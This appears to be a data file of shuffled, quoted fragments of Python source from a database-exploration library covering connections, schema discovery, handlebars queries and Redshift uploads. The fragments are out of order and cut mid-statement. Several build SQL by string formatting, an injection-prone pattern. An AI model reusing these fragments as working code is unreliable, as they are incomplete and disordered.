"foreign and reference keys. 
This is used to control the rendering of PrettyTable", "ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if self.dbtype in", "= str(query) else: return q return query def query(self, q, data=None, union=True, limit=None):", "1 1 None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho...", "# table metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys',", "= DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\",", "of all credentials for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else:", "| Employee | Address | NVARCHAR(70) | | Genre | GenreId | INTEGER", "foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name,", "# we can't do this in the function definition because we're # lazily", "import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile)", "prefixed w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans", "data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at", "col_meta = self.cur return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} #", "drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to", "Query your database from a file. Parameters ---------- filename: str A SQL script", "os import sys from collections import defaultdict import pandas as pd import pybars", "credentials so you don't have to save them in script. 
Parameters ---------- profile:", "'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con = pymssql.connect(host=hostname, user=self.username,", "cache=False): if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port", "Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit: q", "| INTEGER | | Genre | GenreId | INTEGER | | Invoice |", "will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str your aws access key. if this", "self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col),", "Examples -------- No doctest, covered by unittest list_profiles() {'demo': {u'dbname': None, u'dbtype': u'sqlite',", "profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for", "self._try_command(sql) self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key", "boto is present, set the bucket_location to default. # we can't do this", "from your environment variables AWS_SECRET_KEY: str your aws secrety key. if this is", "Customer | CustomerId | INTEGER | | Employee | ReportsTo | INTEGER |", "database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str):", "Walks 1 1 GenreId Composer Milliseconds \\ 0 1 <NAME>, <NAME>, <NAME> 343719", "<NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>,", "0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q =", "database hostname: str Hostname your database is running on (i.e. \"localhost\", \"10.20.1.248\") port:", "specified! 
Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache =", "conn_str = ((self.username and self.password) and \"{}{}\".format( base_con, \"User Id={username};Password={password};\".format( username=self.username, password=self.password )", "A SQL script data: list, dict Optional argument for handlebars-queries. Data will be", "def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\"", "creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials", "time to run the \\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to", "to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create", ">>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in", "not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY", "self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username,", "print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt", "prefix, so it'll pick up # all of the data*.gz files we've created", "down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket: conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def", "ALL\" handlebars templates. 
This will return any handlebars queries as a single data", "them into a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t],", "> 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.to_dict()) @property def credentials(self): \"\"\"Dict representation", "len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns)", "profile: str Preconfigured database credentials / profile for how you like your queries", "= defaultdict(list) for rel in self.cur: # second value in relationship tuple is", "in some way for all those doctests to be viable... -= if not,", "Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album |", "to default port for db. portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a", "\"dbname\": self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self,", "= self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q = self._query_templates['system']['schema_with_system']", "save them in script. 
Parameters ---------- profile: str (optional) identifier/name for your database", "| | PlaylistTrack | PlaylistId | INTEGER | | Track | TrackId |", "5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId", "def __repr__(self): return self.__str__() def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"):", "from db import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\")", "from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if limit:", "credentials plus tables dict representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles():", "return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database", "2 Balls to the Wall 2 2 2 3 Fast As a Shark", "= {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile =", "Id={username};Password={password};\".format( username=self.username, password=self.password ) ) or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur", "connections. 
Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try:", "import pandas as pd import pybars from .column import Column, ColumnSet from .table", "password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB", "0.99 6 Let's Get It Up 0.99 7 Inject The Venom 0.99 8", "self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for row in", "5439 mysql: 3306 sqlite: n/a mssql: 1433 filename: str path to sqlite database", "2 Restless and Wild 3 Restless and Wild 4 Restless and Wild 5", "6 1 <NAME>, <NAME>, <NAME> 233926 7 1 <NAME>, <NAME>, <NAME> 210834 8", "port = 1433 elif profile is not None: pass else: raise Exception(\"Database type", "definitions. Most of you probably don't need this, but if you're a db", "= creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"):", "not to include \"system\" tables (the ones that the database needs in order", "u'localhost', u'password': None, u'port': 5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename':", "self.port = port self.filename = filename self.dbname = dbname self.dbtype = dbtype self.schemas", "self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname: hostname = self.hostname elif hasattr(self, 'port'):", "\"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver", "much faster when it comes time to run the \\COPY statment. 
# #", "col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite if", "import Key from boto.s3.connection import Location # if boto is present, set the", "Address | NVARCHAR(70) | | Genre | GenreId | INTEGER | | Invoice", "HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True except ImportError:", "elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\": port = 1433 elif profile is", "NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+", "Finger On You 1 1 6 7 Let's Get It Up 1 1", "limit=None): \"\"\" Query your database from a file. Parameters ---------- filename: str A", "cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password self.hostname =", "{} for arg in [\"username\", \"password\", \"hostname\", \"port\", \"dbname\"]: if getattr(self, arg): value", "DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns)", "Name | Type | +----------+----------------+--------------+ | Customer | Address | NVARCHAR(70) | |", "sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta = {} # pull", "from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f =", "= len(df) chunks = range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY)", "Rock We Salute You Name UnitPrice 0 For Those About To Rock (We", "Track | MediaTypeId | INTEGER | | Track | GenreId | INTEGER |", "from boto.s3.connection import S3Connection from boto.s3.key import Key from boto.s3.connection import Location #", "is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) 
self.con.autocommit = True self.cur", "t.start() threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if", "continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000):", "for the database.\"\"\" if self.filename: db_filename = os.path.join(os.getcwd(), self.filename) else: db_filename = None", "Snowballed 1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\", "... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>> len(db.query(q)) 3503", "None indicates that there will be no limit (That's right, you'll be limitless.", "profile.pop('tables', None) if tables: profile['metadata'] = True else: profile['metadata'] = False profiles[f[7:]] =", "running on (i.e. \"localhost\", \"10.20.1.248\") port: int Port the database is running on.", "override it by adding limit={X} to the `query` method, or by passing an", "w/ prod_ >>> results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>>", "columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name | Type | +-----------+-------------+---------------+", "uuid import re import os import sys from collections import defaultdict import pandas", "filename: str path to sqlite database dbname: str Name of the database schemas:", "self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively", "9 For Those About To Rock We Salute You Name UnitPrice 0 For", "exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql", "Wild 3 Restless and Wild 4 Restless and Wild 5 For Those About", "data from s3 to redshfit...\") sql = \"\"\" copy {name} from 's3://{bucket_name}/data' credentials", "pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = 
True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\":", "| Customer | Address | NVARCHAR(70) | | Customer | SupportRepId | INTEGER", "else: self.username = username self.password = password self.hostname = hostname self.port = port", "sys from collections import defaultdict import pandas as pd import pybars from .column", "# defaults to using SQLite format. need to convert it to Postgres sql", "remove_profile(name, s3=False): \"\"\" Removes a profile from your config \"\"\" user = os.path.expanduser(\"~\")", "3 Fast As a Shark 3 2 3 4 Restless and Wild 3", "Defaults to all. profile: str Preconfigured database credentials / profile for how you", "2 5 6 Put The Finger On You 1 1 6 7 Let's", "in data] query = [str(item) for item in query] if union==True: query =", "used to control the rendering of PrettyTable a bit. None means that you'll", "0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1", "| InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER | |", "INNER JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... ''' >>>", "to create them. \"\"\" sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert =", "handlebars-queries. Data will be passed to the template and rendered using handlebars. union:", ", ... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data", "= load_from_json(f) return prof.get('tables', None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus", "NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track | Name", "sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into", "import query_templates # attempt to import the relevant database libraries # TODO: maybe", "0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name, ... 
t.UnitPrice", "'schema_specified' in \\ self._query_templates['system']: schemas_str = ','.join([repr(schema) for schema in self.schemas]) q =", "Default number of records to return in a query. This is used by", "self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or", "Wall 2 2 3 Restless and Wild 2 3 4 Let There Be", "ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite HAS_SQLITE = True except", "(optional) identifier/name for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile)", "t in sorted(tables.keys())]) # optimize the foreign/ref key query by doing it one", "Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def", "some cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db =", "query = str(query) else: return q return query def query(self, q, data=None, union=True,", "union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename,", "the \\COPY here. the s3 argument is a prefix, so it'll pick up", "Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols", "False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID = \".db.py_s3_\" class DB(object): \"\"\" Utility for exploring", "Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password,", "hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None, schemas=None, profile=\"default\", exclude_system_tables=True, limit=1000, keys_per_column=None, driver=None, cache=False): if", "speed is *much* faster if chunks = multiple-of-slices. 
Ex: DW1.XL nodes have 2", "tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if", "5 For Those About To Rock We Salute You 6 For Those About", "in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names", "| ArtistId | INTEGER | | Artist | ArtistId | INTEGER | |", "StringIO # Python 3.3+ import uuid import re import os import sys from", "\\COPY statment. # # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df", "try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety", "limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self, filename, data=None, union=True,", "we've created sys.stderr.write(\"Copying data from s3 to redshfit...\") sql = \"\"\" copy {name}", "s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to chunk the file", "| INTEGER | | Track | Bytes | INTEGER | +-------------+----------------+--------------+ \"\"\" if", "str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\")", "to save them in script. 
Parameters ---------- profile: str (optional) identifier/name for your", "Title \\ 0 For Those About To Rock We Salute You 1 Balls", "in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else:", "<NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424 0.99 2", "and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur:", "| Track | Name | NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns", "the file into pieces. according to amazon, this is # much faster when", "HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL =", "ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError: HAS_MYSQL", "q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit)", "MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER | | Track", "PlaylistTrack | TrackId | INTEGER | | PlaylistTrack | PlaylistId | INTEGER |", "* from ({q}) q limit {limit}\".format(q=q, limit=limit) return q # mssql else: if", "self.cur.execute(\"drop table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table", "Track t ... on a.AlbumId = t.AlbumId; ... 
''' >>> with open(\"db/tests/myscript.sql\", \"w\")", "for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF", "0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99 5 6713451 0.99", "self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified' in \\ self._query_templates['system']: schemas_str", "if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must", "return in a query. This is used by the DB.query method. You can", "= self.con.cursor() self._create_sqlite_metatable() elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or", "CustomerId | INTEGER | | Invoice | BillingAddress | NVARCHAR(70) | | InvoiceLine", "column_name varchar, data_type varchar);\") for row in rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type)", "the database password: str Your password for the database hostname: str Hostname your", "import glob import gzip try: from StringIO import StringIO # Python 2.7 except:", "5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\": port = None elif dbtype==\"mssql\":", "if limit: q = q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit", "to the template and rendered using handlebars. union: bool Whether or not \"UNION", "pymysql library. 
Please ensure it is installed\") creds = {} for arg in", "it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True", "q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't", "data_type) in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates,", "instance of DB that hooks up to the Chinook DB See http://chinookdatabase.codeplex.com/ for", "self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None:", "encoded JSON file. This is not to say this a secure way to", "= False try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False", "| INTEGER | | Track | MediaTypeId | INTEGER | | Track |", "It Up 0.99 7 Inject The Venom 0.99 8 Snowballed 0.99 9 Evil", "| EmployeeId | INTEGER | | Genre | GenreId | INTEGER | |", "self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save", "{{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data = {\"cols\":", "but it will probably stop your little sister from stealing your passwords. Parameters", "AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via", "1 4 5 Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data,", "return q # mssql else: if limit: q = \"select top {limit} *", "347 db.query(q, data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To", "About To Rock We Salute You 6 For Those About To Rock We", "2 slices per node, so if running 2 nodes you will want chunk_size=4,", "info. 
\"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite',", "column_name, data_type, self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as", "= s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None: AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if", "database password: str Your password for the database hostname: str Hostname your database", "base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or ''", "(sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if isinstance(data, list):", "SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}} ...", "List of schemas to include. Defaults to all. profile: str Preconfigured database credentials", "out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return", "\"CREATE TABLE IF NOT EXISTS\") if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit() #", "from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info", "\"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg] =", "Name | Type | +---------------+---------------+---------+ | Album | AlbumId | INTEGER | |", "that the database needs in order to operate). 
This includes things like schema", "| +---------------+---------------+---------+ | Album | AlbumId | INTEGER | | Album | ArtistId", "| Employee | EmployeeId | INTEGER | | Genre | GenreId | INTEGER", "= creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your", "| INTEGER | +-------------+----------------+--------------+ \"\"\" if isinstance(data_type, str): data_type = [data_type] cols =", "union=True): if (sys.version_info < (3, 0)): q = unicode(q) template = self.handlebars.compile(q) if", "for table in self._metadata_cache: # table metadata table_meta[table['name']] = {k: table[k] for k", "cache if dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if", "Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all", "\"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\"", "the database schemas: list List of schemas to include. Defaults to all. profile:", "from boto.s3.connection import Location # if boto is present, set the bucket_location to", "library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname)", "if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or", "(the ones that the database needs in order to operate). This includes things", "rows_to_insert: self.cur.execute(\"insert into tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM", "We Salute You Name UnitPrice 0 For Those About To Rock (We Salute", "t ... on a.AlbumId = t.AlbumId; ... 
''' >>> with open(\"db/tests/myscript.sql\", \"w\") as", "buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket: bucket = conn.get_bucket(s3_bucket)", "343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99 1 0.99", "your database with a raw string. Parameters ---------- q: str Query string to", "if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please", "passed to the template and rendered using handlebars. union: bool Whether or not", "This includes things like schema definitions. Most of you probably don't need this,", "... {{/if}} ... {{/cols}} ... FROM ... Album; ... ''' >>> data =", "Name | NVARCHAR(120) | | Playlist | Name | NVARCHAR(120) | | Track", "your database credentials so you don't have to save them in script. Parameters", "tables (the ones that the database needs in order to operate). This includes", "Employee | EmployeeId | INTEGER | | Employee | Address | NVARCHAR(70) |", "AlbumId | INTEGER | | Track | MediaTypeId | INTEGER | | Track", "Track | MediaTypeId | INTEGER | | Track | Milliseconds | INTEGER |", ")) t.start() threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\")", "tmp_dbpy_schema(table_name, column_name, data_type) values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql", "conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're going to", ">>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name AlbumId MediaTypeId \\\\\\r", "a TableSet self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for", "as table_name, ... COUNT(*) as cnt ... FROM ... 
{{ name }} ...", "filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username", "table_meta = self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema", "to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f,", "INTEGER | | MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId", "There Be Rock 1 4 5 Big Ones 3 \"\"\" if data: q", "conn.delete_bucket(bucket_name) sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables", "by adding limit={X} to the `query` method, or by passing an argument to", "for handlebars-queries. Data will be passed to the template and rendered using handlebars.", "-= Should sort in some way for all those doctests to be viable...", "foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates,", "i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f:", "representation.\"\"\" db_dict = self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of", "profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes", "u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles", "| ArtistId | INTEGER | | Customer | SupportRepId | INTEGER | |", "| INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+ |", "exclude_system_tables=True, use_cache=False): \"\"\" Pulls your 
database's schema again and looks for any new", "210834 8 1 <NAME>, <NAME>, <NAME> 203102 9 1 <NAME>, <NAME>, <NAME> 263497", "doens't exist sql = sql.replace(\"CREATE TABLE\", \"CREATE TABLE IF NOT EXISTS\") if print_sql:", "\"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is None: continue for (column_name,", "Utility for exploring and querying a database. Parameters ---------- username: str Your username", "+----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer |", "dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None,", "Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>, <NAME>, <NAME> 205662 6 1", ">>> from db import DemoDB >>> db = DemoDB() >>> q = '''", "1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel", "return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename, \"dbname\":", "isinstance(data, list): query = [template(item) for item in data] query = [str(item) for", "(\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None,", "3503 >>> q = ''' ... SELECT ... {{#cols}} ... 
